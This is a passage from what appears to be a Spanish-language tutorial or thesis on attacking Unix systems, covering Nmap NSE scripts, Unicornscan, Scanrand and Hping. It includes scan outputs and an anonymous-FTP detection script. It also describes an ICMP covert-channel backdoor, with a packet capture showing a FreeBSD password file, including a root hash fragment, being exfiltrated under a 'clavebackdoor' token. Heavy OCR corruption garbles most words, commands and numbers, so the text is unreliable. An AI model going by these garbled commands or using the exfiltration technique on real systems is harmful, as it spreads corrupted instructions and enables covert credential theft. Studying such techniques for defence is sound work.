*-- Ler Plosario% ,cri"t# "g. 2*2. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.. de 22O
bien el /inger"rinting basado en e9"resiones regulares es "oderoso# no sie "re obtiene toda la in/or aci8n "osible# co o sucede con el "rotocolo ,MB ' @F,. 2n scri"t en el @,E "uede recabar caso o en otros.
Detecci-n ! Fxplotaci-n de Bulnera(ilidades% ,i un aviso de seguridad se "ublica ' se dis"one de la "rueba de conce"to# con un scri"t en @ a" se "uede $acer un r"ido c$equeo del estado de esta vulnerabilidad. :o is o sucede uc$os $osts con res"ecto a con la e9"lotaci8n de
vulnerabilidades# segura ente de i "ortancia "ara los penetration testers. @ a" inclu'e en su distribuci8n "or de/ecto varios scri"ts listos "ara ejecutarse# ' 'a que estn basados en el lenguaje :2A *-1# son de lectura# anlisis ' u' sencilla odi/icaci8n. !or eje "lo# uno de estos co "rueba si un
servicio FF! "er ite login del usuario C anon1mousD# co o se "uede ver en la Consola 21H "or su "arte# el c8digo /uente se inclu'8 en la Consola 25.
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap &&scriptR./anon+2*.nse &< &s- &p 21 192.168.0.100 .tarting Nmap +.60 9 'ttp:;;nmap.org : at (00)-0+-09 (1:31 #$T 8nitiating #$P Ping .!an at (1:31 .!anning 19(.16).0.100 -1 port0 ,omp"ete7 #$P Ping .!an at (1:314 0.0( e"ap e7 91 tota" 'o t : 8nitiating ./N .tea"t' .!an at (1:31 .!anning t unami 919(.16).0.100: -1 port0 Di !o@ere7 open port (1;t!p on 19(.16).0.100 ,omp"ete7 ./N .tea"t' .!an at (1:314 0.0( e"ap e7 91 tota" port : .,$8PT <NH8N<: 8nitiating !ript !anning. 8nitiating .,$8PT <NH8N< at (1:31 ,omp"ete7 .,$8PT <NH8N< at (1:314 +.73 e"ap e7 ?o t t unami 919(.16).0.100: appear to be up ... goo7. 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< 21/tcp open 6tp ON %nonDmous +2*: +2*: %nonDmous login allo>ed 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: $ea7 7ata fi"e from: ;'ome;mar!e"o; r!;nmap; 'are;nmap Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 5.3)3 e!on7 $a> pa!6et ent: ( 9)6C: F $!@7: ( 9)6C: marcelo@saturno:~/src/nmap/bin$
otor del lenguaje# @,E inclu'e una A!7 o s co unes "ara que los scri"ts o ento# s8lo s sencillos "osibles. =asta el
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.* de 22O
dos ti"os de scri"ts son so"ortados% 4or servicio% ,e ejecutan cada vez que un "uerto abierto es detectado# ' su salida se uestra en la /ila res"ectiva de dic$o servicio en el in/or e de a'or in/or aci8n. @ a"H $a' dis"onibles varios scri"ts que detectan ciertos servicios con s "recisi8n o con
4or 9ost% ,on ejecutados "or $ost a escanear# 'a que "ueden estar asociados a tareas con el no bre de do inio# situaci8n dentro de la <ed destino ' su /ireIall# 7!# etc.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.2 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.- de 22O
i71V#nonEmou BTPV 7e !ription1V,'e!6 to ee if a BTP er@er a""o> aut'or 1 V<77ie Ce"" TeY"be""Igmai".!om>V "i!en e 1 V.ee nmap ,OP/8NH for "i!en!eV !ategorie 1 aVintru i@eVb require V 'ortportV portru"e 1 'ortport.portAorA er@i!e9(14 VftpV: a!tion 1 6unction9'o t4 port: local o!6et 1 nmap.ne>A o!6et9: local re u"t local tatu 1 true local i #non 1 6alse local errA!at!' 1 6unction9: o!6et:!"o e9: end local trE 1 nmap.ne>AtrE9errA!at!'9::
anonEmou
"ogin V
o!6et: etAtimeout95000: trE9 o!6et:!onne!t9'o t.ip4 port.number4 port.proto!o":: trE9 o!6et: en79VK.<$ anonEmou [r[nV:: trE9 o!6et: en79VP#.. 8<K erI[r[nV:: >Iile tatu do tatu 4 re u"t 1 o!6et:re!ei@eA"ine 91:L i6 tring.mat!'9re u"t4 VW(30V: tIen i #non 1 true brea= end end o!6et:!"o e9: i69i #non: tIen return VBTP: #nonEmou end en7 "ogin a""o>e7V
Consola 25% Fuente del ,cri"t "ara @,E que detecta si un ,ervidor FF! ace"ta login an8ni o
J.-. 2nicornscan
:os desarrolladores de 2nicornscan lo de/inen co o un frame.ork)0D distribuido de Est) ulo&<es"uesta utilizando co o i "le entar un stac6 FC!&7! distribuido en edio la red# "or lo que no s8lo es un "ort scanner. ,e distribu'e bajo la licencia P!: v2# ' su objetivo es odo usuario *-J. Est diseBado "ara is o que Csola ente ser Cescalable# "reciso# /le9ible ' e/icienteD *-+# que no es lo
*-5 Ler Plosario% Fra eIor6# "g. 2*.. *-J El so/tIare en C odo usuarioD es aquel que es ejecutado "or el ,? co o un "roceso usuario# ' bajo sus "rivilegios# a di/erencia de los "rocesos o *-+ ,itio del !ro'ecto 2nicornscan% $tt"%&&III.unicornscan.org& C odo nGcleoD ;o kernel>. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&RernelU ode
s del
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.1 de 22O
Ca")tulo J. ( J.-.2nicornscan
s i "ortantes son%
Escaneo FC! asincr8nico sin estado# con todas las co binaciones de banderas FC!. 5anner @rabbing FC! asincr8nico# sin estado. Escaneo asincr8nico 25! de "rotocolos es"ec)/icos ;env)a lo su/iciente en el "a'load 25! "ara obtener una res"uesta>. 7denti/icaci8n activa ' "asiva del ,iste a ?"erativo ' a"licaciones# analizando las res"uestas. :og ' Filtrado de arc$ivos !CA!*-O ,alida a Bases de 5atos relacionales "ara "osterior anlisis. ,o"orte de 8dulos "ersonalizados ;'a que "rovee una A!7>. Listas "ersonalizadas de conjuntos de datos. Mide el caudal ;o Ct roug putD2 de entrada&salida de la red en "aquetes "or segundo ;!!,>. ,u arquitectura est basada en "rocesos ;no $ilos *-0># ' una uestra del
is o en /unciona iento se encuentra en la 7lustraci8n O S2@7C?<@U5EFC?@T# donde se "uede ver un !ort ,can distribu)do.
a'or)a
de sni//ers# scanners ' analizadores de red lo utilizan. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&!ca" *-0 Ler Plosario% =ilos ;F$reads># "g. 2**. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.5 de 22O
Ca")tulo J. ( J.-.2nicornscan
a'or
inde"endencia ' "otencial escalabilidad# $asta el "unto de "oder construir un cluster*1. de nodos co o "ortscanner# analizadores de red# o lo que se necesite ;recordar el co "orta iento Cest) ulo&res"uestaD de 2nicornscan>. !ara esto es necesario i "le entar el anejo FC! "or s) is o# dejando de lado el del nGcleo del ,iste a ?"erativo donde se ejecute. :os co "onentes "rinci"ales son tres%
C/aster &ontrolD% Es un Gnico "roceso que tiene el control de todas las o"eraciones# qu se debe enviar# quin lo debe $acer# global de la ejecuci8n del "rogra a. antiene los estados de las cone9iones# las res"uestas# etc. En resu en# i "le enta la l8gica Unisend% Es un "roceso que s8lo se encarga de enviar "aquetes "or la red. !uede $aber varias instancias de ellos en un o ento deter inado. Unilisten% Es el "roceso que s8lo se encarga de escuc$ar "or res"uestas# ' devolverlas al /aster &ontrol. 2nicornscan# "ara lograr escalabilidad ' velocidad# utiliza el is o todo
de
anejo asincr8nico ' sin estado de cone9iones FC! ;C,K@ cookies inversoD>
*1. Cluster% Conjunto de co "utadoras que trabajan en gru"o ' actGan co o un nodo Gnico e indivisible# en "os de lograr un objetivo su ando el recurso de cada uno de sus co "onentes. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUcluster Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.J de 22O
Ca")tulo J. ( J.-.2nicornscan
marcelo@saturno:~/src/unicornscan/bin$ u7o .;uni!orn !an -@ !i!"on a77ing 19(.16).0.30;3( mo7e cT,P !anJ port c74941141341)4194(1(34(54374394+(4+9450453465467-70479-)14))49)41004105-10741091114113411)411941(341(941354137-1394?...@J pp 300 u ing interfa!e9 : et'0 !aning 1.00eP00 tota" 'o t >it' 3.3)eP0( tota" pa!6et 4 'ou"7 ta6e a "itt"e "onger t'an ) .e!on7 en7er tati ti! (9+.+ pp >it' 33) pa!6et ent tota" "i tener tati ti! ) pa!6et re!ie@e7 0 pa!6et 7rope7 an7 0 interfa!e 7rop T,P open ftp(10 from 19(.16).0.30 tt" 6+ T,P open '((0 from 19(.16).0.30 tt" 6+ T,P open 7omain530 from 19(.16).0.30 tt" 6+ marcelo@saturno:~/src/unicornscan/bin$
J.1. ,canrand
Este "ortscanner est inclu)do en una CsuiteD de $erra ientas de seguridad lla ada C!a6etto ReiretsuD*1*# desarrollada "or 5an Ra ins6'. Fiene co o "ri er ' s i "ortante objetivo $acer su trabajo lo ms rpido posi(leK ade s# "osee un diseBo "arecido al de 2nicornscan ;aunque ste es "osterior>. :a di/erencia "rinci"al reside en que ,canrand no "osee un "roceso de control aestro ;no lo necesita# 'a que s8lo es un !ort ,canner># ' no crea @ "rocesos CenviadoresD o senders. En su que s8lo env)e la eta de alcanzar el 9i o rendi iento en un escaneo# esta $erra ienta innov8 en algunos as"ectos. !or eje "lo# al i "le entar un "roceso ensajes ' otro que s8lo los reciba sin co unicarse entre s)H ' ejorar# en un "roceso de es"acio del usuario# "arte de ta bin al i "le entar '
quina /inita de estados de FC!*12. !ara esto su autor# 5an Ra in6s'# desarroll8 la tcnica del C7nverted ,K@
Coo6ieD# o ,K@ Coo6ie 7nverso# que intenta a"licar la tcnica de las ,K@ Coo6ies*1- "ero del lado del cliente ;quien realiza el "ortscan>. A grandes rasgos S,A@,U,CA@<A@5T# ,canrand /unciona de la siguiente anera% I. Crea un "roceso CenviadorD ;sender> ' el "roceso "rinci"al se convierte en CrecibidorD o Cescuc$adorD ;listener o receiver>. Penera un nG ero CclaveD o Cse illaD ;seed># aleatorio "or de/ecto# que se utilizar en toda la
*1* 2<:% $tt"%&&III.do9"ara.co & *12 !ara ver la F,M ;Finite State /ac ine N Mquina de Estados Finitos> de FC!# ir al Ane9o A. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.+ de 22O
Ca")tulo J. ( J.1.,canrand
ejecuci8n del "rogra a. II. Al "roceso enviador s8lo le dice qu $osts ' "uertos debe escanear# envindole ta bin la clave a utilizar. III. Este s8lo env)a los ,K@s a los destinos corres"ondientes ' ter ina# "ero utilizando co o 7,@*11 el resultado de la siguiente /8r ula*15%
IANOTruncar D81A/.A8A.7 DDI40ri)II4DestI4to0ri)I4toDestE% /laveE% ;+(itsE
5onde =MAC es un algorit o "ara generar un c8digo de autenticaci8n del ensaje*1J. Ka que en un escaneo $abr s8lo una Gnica co binaci8n de
)I+
estos cinco "ar etros# cada IAN )enerado por esta =-rmula es 'nico# ' "odr)a considerrselo un as . Este valor es lo que se lla a C,K@ odo "ro iscuo ;es "or Coo6ieD# ' es inverso "orque se lo calcula en el cliente ' no en el servidor. IB. El "roceso que escuc$a "or res"uestas lo $ace en esto que "ara ejecutar ,canrand es necesario tener los "rivilegios adecuados>. !or cada "aquete que recibe o Cca"turaD el $ost# ,canrand se encarga de veri/icar que est dirigido a l# 'a que "uede que el is o sea "roducto del escaneo o no ;otro tr/ico del $ost>. :a Gnica in/or aci8n que utiliza "ara $acerlo es el "aquete recibido en s) ' la clave generada al co ienzo. B. El todo de veri/icaci8n consiste en% 7. Ca"turar un "aquete dirigido al $ost. +. El "aquete "ertenece a ,canrand si% a. El "a'load 7! contiene un "aquete del "rotocolo 7CM!# o
*1- :a tcnica de las ,K@ Coo6ies /ue desarrollada en *00J co o res"uesta a los ataques de Cinundaci8n de ,K@sD ;,K@ floods>. Consiste en que el ,?# teniendo "rocesos en odo :7,FE@# no reserve recursos "ro"ios cuando recibe un ,K@# sino descartarlo# ' devolver el ,K@_ACR al cliente con una /ir a un)voca en el nG ero de secuencia inicial FC!. 5ic$a /ir a es el resultado de cierta in/or aci8n del ,K@ original# a"licada a una /unci8n de dis"ersi8n ; as >. Al recibir el ACR corres"ondiente# el ,? "uede identi/icar si corres"onde a una cone9i8n vlida o no# veri/icando una "osible /ir a en el ca "o @G ero de ACR FC!. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,'nUcoo6ies# $tt"%&&en.Ii6i"edia.org&Ii6i&,K@U/lood *11 !ara ver qu es un 7,@# ir a la "gina J0. *15 En dic$a /8r ula# el s) bolo C_D signi/ica concatenaci8n. ,canrand la trunca a -2 bits ;=MAC(,=A(* genera un $as$ de *J. bits> "ara que "ueda ser al acenada en el ca "o ,EV del encabezado FC!. =a' que tener en cuenta esto reduce la e/ectividad del algorit o ,=A(*. *1J !ara s in/or aci8n sobre =MAC# ver% $tt"%&&en.Ii6i"edia.org&Ii6i&= ac *1+ Ler Plosario% =as$# "g. 2**. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.O de 22O
Ca")tulo J. ( J.1.,canrand
(. Es FC! ' el /lag de ,K@_ACR activado# o c. Es FC! ' el /lag <,F_ACR estn activados# o d. Es FC! ' el /lag <,F est activado. e. En caso contrario# "asar al siguiente "aquete ca"turado ;7r a *>. ;. ?btener el @G ero de ACR del ca "o FC! ' restarle *. Este valor es igual al 7,@ que recibi8 el destino. IAN+ O A/J.7. <. Penerar el 7,@ "ara la co binaci8n 7! ?rigen# 7! 5estino# !uerto ?rigen# !uerto 5estino# Clave# de la ; enos la clave# claro est>.
IANOTruncar ;+(itsE D81A/.A8A.7 DDI40ri)II4DestI4to0ri)I4toDestE% /laveE%
. ,i 7,@ a 7,@2# el "aquete "ertenece a una res"uesta a un probe de ,canrand. #. ,e evalGa el&los /lags FC! o 7CM! que contiene el "aquete# "ara ostrar "or la salida el resultado del "robe "ara dic$o "uerto ;abierto# cerrado# etc.>.
root@ubuntu&ser<er:~A !anran7 -b13 -t 1 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.1(+ root@ubuntu&ser<er:~A !anran7 -b13 -t 3 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.091 root@ubuntu&ser<er:~A !anran7 -b13 -t 5 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.0(+ KP: 19(.16).0.1:(1 -0(0 15.350 KP: 19(.16).0.30:(1 -010 15.930 KP: 19(.16).0.100:(1 -010 17.330 KP: 19(.16).0.(0:(( -010 (0.)(9 KP: 19(.16).0.30:(( -010 (1.031 KP: 19(.16).0.1:(3 -0(0 (5.551 KP: 19(.16).0.100:(3 -010 (7.5(9 root@ubuntu&ser<er:~A
que "uede># es"ere "or res"uestas una cierta cantidad de tie "o# utilice una se illa en "articular# etc. 2na ejecuci8n de eje "lo se uestra en la Consola 2+# donde se le indica a ,canrand que escanee una subred de 25J $osts# utilice * MB&seg. del anc$o de banda ;(b*M># ' es"ere *# - ' $asta 5 segundos "or res"uestas coincidentes. Es aqu) donde "uede a"reciarse la "osibilidad de ignorar
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.0 de 22O
Ca")tulo J. ( J.1.,canrand
En conclusi8n# el "roceso de escaneo de "uertos de ,canrand es asincr8nico# escalable ' uc$o s r"ido que un escaneo secuencial ;"uerto "or "uerto ' $ost onitoreo# aunque est bien claro que no es la "or $ost>. :a desventaja que tiene es que es "oco "robable que "ase desa"ercibido "ara los 75,s o $erra ientas de intenci8n de ,canrand evitarlasH ade s# $a' que tener en cuenta que en este caso la velocidad va en des edro de la "recisi8n. Es "or esto que ,canrand "uede ser u' Gtil "ara redes locales grandes ' r"idas# con buen anc$o de banda ' baja latencia# o donde no i "orte "asar desa"ercibido "ara el ad inistrador.
en el aBo 2..5> su creador# ,alvatore ,an/ili""o# incor"or8 un intr"rete e bebido del lenguaje FC:*5.# con el objetivo de a "liar aGn "er itir ejecutar scri"ts de la is a /or a *5* que @ a" dos aBos des"us
"er iti8 $acer. Ade s de estar reescrito en dic$o lenguaje# ="ing a'or co "atibilidad "osible con su versi8n anterior ;escrita en C>. !er itiendo al usuario la "ersonalizaci8n
!ruebas de reglas de /ireIalls ' /unciona iento de 75,s&7!,s. !ort ,canning avanzado# co o "or eje "lo el 7dle ,can ;no casual ente# 'a que el autor de ="ing /ue el que desarroll8 este ti"o de "ortscan>.
*1O ,itio Ieb del !ro'ecto ="ing% $tt"%&&III.$"ing.org& *10 A la de/inici8n C ani"ulaci8n de "aquetesD se la "uede asociar con C packet craftingD en el idio a ingls. !ara s in/or aci8n# ver% $tt"%&&III.securit'/ocus.co &in/ocus&*+O+ is o objetivo que @ a"H la distribuci8n estndar de ="ing *5. !gina o/icial del lenguaje FC:% $tt"%&&III.tcl.t6& *5* ="ing- inclu'e una A!7 con el inclu'e algunos scri"ts en lenguaje FC: ' que $acen uso de ella. Ler este enlace "ara conocer s sobre sus /uncionalidades% $tt"%&&Ii6i.$"ing.org&-1 Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **. de 22O
!robar la "er/or ance de la red utilizando di/erentes "rotocolos# ta aBos de "aquetes# valores de F?, 7! ;-1pe of Service H Fi"o de ,ervicio> ' /rag entaci8n de "aquetes. Pat /-U (iscover1)DA ;algo as) co o C5escubri iento del MF2 de la <utaD>. Esta es una tcnica "ara averiguar el MF2 ;2nidad 9i a de trans isi8n> de una ruta a un $ost. 5ado que un "aquete "uede atravesar varias redes de di/erentes tecnolog)as ' "or ende# di/erentes valores de MF2# el !at$ MF2 5iscover' "er ite averiguar cul es el ta aBo 9i o de "aquete 7! "ara que no se lo /rag ente en ningGn salto en su ca ino al destino. Frans/erencia de arc$ivos incluso entre reglas de /ireIall u' restrictivas
;creaci8n de &overt & annels o 5ack (oors>. 2n &overt & annel ;S47R7UC?LC=T#S,A@,UC?LC=T#S<?4UC?LC=T > es un canal de trans isi8n datos oculto# donde se utilizan o a"rovec$an "ro"iedades de la co unicaci8n en /or as di/erentes de las que /ue "ensado original ente# con la intenci8n de $acer "asar la co unicaci8n total ente desa"ercibida. !or eje "lo# con ="ing es "osible trans/erir datos v)a un "rotocolo no "ensado "ara ello# co o 7CM!.
-raceroute bajo todos los "rotocolos so"ortados ;no s8lo 25!>. Es decir# se "uede $acer un traceroute enviando "aquetes 7! con FF: incre entales "ero con "a'load FC!# "or eje "lo.*5Fire.alking. Esta es una tcnica derivada del traceroute ; SF4A:RT> que "er ite averiguar las reglas de /iltrado de un /ireIall envindole "aquetes es"ecial ente "re"arados. Finger"rinting de ,?s. Auditor)a del ,tac6 FC!&7!. Muc$os otros. ="ing ace"ta con di/erentes o"ciones de la l)nea de co andos el odo
;C"ingD "or de/ecto># el ti"o ;7CM!# FC!# 25!> de "aquetes a enviar# as) co o las di/erentes o"ciones de sus encabezados.
*52 !ara ver s de !MF25% Lisitar $tt"%&&en.Ii6i"edia.org&Ii6i&!at$U tuUdiscover'# o bien s in/or aci8n sobre Fraceroute# ver el Ca")tulo O de SFC!&7!U7llT.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *** de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **2 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **- de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **1 de 22O
marcelo@saturno:~$ sudo Iping 192.168.0.20 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: NO B2#H. are et4 +0 'ea7er P 0 7ata bEte "en1+0 ip119(.16).0.(0 tt"16+ DB i7115++( port10 f"ag 1$# eq10 >in10 rtt10.7 m "en1+0 ip119(.16).0.(0 tt"16+ DB i71)79) port10 f"ag 1$# eq11 >in10 rtt11.) m "en1+0 ip119(.16).0.(0 tt"16+ DB i716+01 port10 f"ag 1$# eq1( >in10 rtt10.+ m "en1+0 ip119(.16).0.(0 tt"16+ DB i7115)61 port10 f"ag 1$# eq13 >in10 rtt10.+ m "en1+0 ip119(.16).0.(0 tt"16+ DB i711(55( port10 f"ag 1$# eq1+ >in10 rtt10.+ m --- 19(.16).0.(0 'ping tati ti! --5 pa!6et tran mitte74 5 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.+;0.7;1.) m marcelo@saturno:~$ sudo Iping &- &c 1 192.168.0.20 &p 80 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: . et4 +0 'ea7er P 0 7ata bEte "en1+0 ip119(.16).0.(0 tt"16+ DB i7130+0 port1)0 f"ag 1$# eq10 >in10 rtt10.6 m --- 19(.16).0.(0 'ping tati ti! --1 pa!6et tran mitte74 1 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.6;0.6;0.6 m marcelo@saturno:~$ sudo Iping &- &c 1 192.168.0.20 &p 22 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: . et4 +0 'ea7er P 0 7ata bEte "en1++ ip119(.16).0.(0 tt"16+ DB i71(0075 port1(( f"ag 1.# eq10 >in1163)+ rtt10.5 m --- 19(.16).0.(0 'ping tati ti! --1 pa!6et tran mitte74 1 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.5;0.5;0.5 m marcelo@saturno:~$ sudo Iping &&scan 22580 &- &c 2 192.168.0.20 .!anning 19(.16).0.(0 919(.16).0.(0:4 port ((4)0 ( port to !an4 u e -= to ee a"" t'e rep"ie P----P-----------P---------P---P-----P-----P-----P FportF er@ name F f"ag Ftt"F i7 F >in F "en F P----P-----------P---------P---P-----P-----P-----P (( ' : ....#... 6+ +3031 163)+ ++ #"" rep"ie re!ei@e7. Done. Not re pon7ing port : marcelo@saturno:~$
En la consola 2O se "uede ver "ri ero la ejecuci8n de ="ing sin o"ciones# la cual corres"onde a un C"ingD FC! @ull al "uerto destino nG ero . ;'a que no se seleccionaron otros Flags o algGn "uerto>. :uego# sie "re dentro del "uerto 22 ;(" 22>. ,i bien el si "les# ="ing "rovee el odo C"ingD# se intenta enviar un ,K@ ;(,> una Gnica vez ;(c *> al "uerto O. ;(" O.> ' al odo C"ingD "uede servir "ara $acer escaneos s acorde a la o"eraci8n. odo CscanD ;((scan h"uertose> "ara es"eci/icar
a'Gscula% (F
;F7@># (, ;,K@># (< ;<,F># (! ;!,=># (A ;ACR># (2 ;2<P>. Fa bin "ueden de/inirse en los "aquetes a enviar cualquier valor del encabezado FC! ;"or eje "lo ((Iin# ((setseq# ((setac6.># 7! ;((ttl# ((id# ((i""roto# ((Iinid# etc.># 7CM! o 25!H en la salida se uestran /inal ente los valores que se utilizan.
marcelo@saturno:~$ sudo traceroute 200.68.121.1.0 tra!eroute to (00.6).1(1.1+0 9(00.6).1(1.1+0:4 30 'op maD4 +0 bEte pa!6et ?...@ + (00.51.(33.69 9(00.51.(33.69: 171.59+ m 1)1.3(+ m 191.96) m 5 (00.51.(17.(3) 9(00.51.(17.(3): (01.+5+ m (1(.106 m (((.51) m 6 !u tomer191-6.ip"annet>or6 .net 9(00.61.191.6: (31.5+0 m (65.(33 m (66.3)) m 7 Q Q Q ?...@ marcelo@saturno:~$ sudo Iping &z &i 10 &t 1 &2 &p 1 200.68.121.1.0 ?P8NH (00.6).1(1.1+0 9et'0 (00.6).1(1.1+0:: u7p mo7e et4 () 'ea7er P 0 7ata bEte TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N 6: TT2 0 7uring tran it from ip1(00.61.191.6 name1!u tomer1916.ip"annet>or6 .net 7: I$G* *ort FnreacIable 6rom ipR200.68.121.1 0 nameRcustomer68&121& 1 0.iplannet>or=s.net 8,3P Port Knrea!'ab"e from ip1(00.6).1(1.137 name1!u tomer6)-1(1137.ip"annet>or6 .net ): --- (00.6).1(1.1+0 'ping tati ti! --) pa!6et tran mitte74 5 pa!6et re!ei@e74 37S pa!6et "o roun7-trip min;a@g;maD 1 0.0;0.0;0.0 m marcelo@saturno:~$ marcelo@saturno:~$ sudo Iping &z &i 10 &t 2 &- &p 21 200.12 .18..1 ?P8NH (00.1(3.1)+.5 9et'0 (00.1(3.1)+.5:: . et4 +0 'ea7er P 0 7ata bEte TT2 0 7uring tran it from ip1(00.51.(+1.((5 name1KN5NO&N 3: TT2 0 7uring tran it from ip1(00.51.(33.) name1KN5NO&N +: TT2 0 7uring tran it from ip1(00.51.(33.69 name1KN5NO&N 5: TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N 6: TT2 0 7uring tran it from ip1(00.61.191.6 name1!u tomer1916.ip"annet>or6 .net 7: TT2 0 7uring tran it from ip1(00.61.175.6 name1!u tomer61-1756.ip"annet>or6 .net ): TT2 0 7uring tran it from ip1(00.1(3.1)+.5 name1!u tomer1(3-1)+5.ip"annet>or6 .net 9: "en1+6 ip1(00.1(3.1)+.5 tt"156 DB i710 port1(1 f"ag 1.# eq1) >in15)+0 rtt173.3 m --- (00.1(3.1)+.5 'ping tati ti! --9 pa!6et tran mitte74 9 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 73.3;73.3;73.3 m marcelo@saturno:~$
En la Consola 20 se
"ri ero# detectando un $ost ;2...JO.*2*.*-+> "revio al destino# "resu ible ente
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **J de 22O
el router '&o /ireIall# que rec$aza los "aquetes que si ulan ser de un servidor 5@,. :uego con FF: igual a O no $a' res"uesta# segura ente es "orque el datagra a lleg8 a destino ;2...JO.*2*.*1.>. ,egundo# se env)a un traceroute con el "uerto FC! O. co o destino% evidente ente el /ireIall ;si lo $a'> "er ite que este "uerto destino "ase "or l. Fa bin es de destacar la /acilidad con la que ="ing "er ite ar ar Ccovert c annelsD sobre cualquier "rotocolo ' "uerto so"ortado# es"ecial ente "ara "uertas traseras% en la Consola -. se "uede ver c8 o se con/igura un canal alternativo "ara enviar arc$ivos utilizando el "rotocolo 7CM!# utilizando el "a'load del "rotocolo is o ;de *2. b'tes> "ara enviar el contenido del arc$ivo de claves de un siste a FreeB,5.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **+ de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **O de 22O
Consola -.% Eje "lo de un Covert C$annel "ara Frans/erencia de arc$ivos sobre 7CM!
El rol que cu "le el equi"o atado es el de enviar el !ing# es el que lo recibe# ' es "or esto que se lo con/igura en
ientras el cliente
is o "ueda identi/icar# entre todo el tr/ico que ca"tura# la secuencia de "ings es"erada# se con/igura la utilizaci8n de un Cto6enD o cadena de caracteres en a bos e9tre os de la co unicaci8n co o una C/ir aD# que en este caso es Cclavebac6doorD. Co o se "uede ver en la Ca"tura *J# dic$o to6en es inclu)do en los "ri eros b'tes de cada "ing con in/or aci8n enviado "or el equi"o co "ro etido ;*02.*JO...-.>. 5e esta anera# el ="ing que est en odo C:istenD ;aunque en realidad es un "roceso que est en deter inar que dic$o "aquete est dirigido a l. odo "ro iscuo> "uede
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **0 de 22O
Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?
Brame 3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0
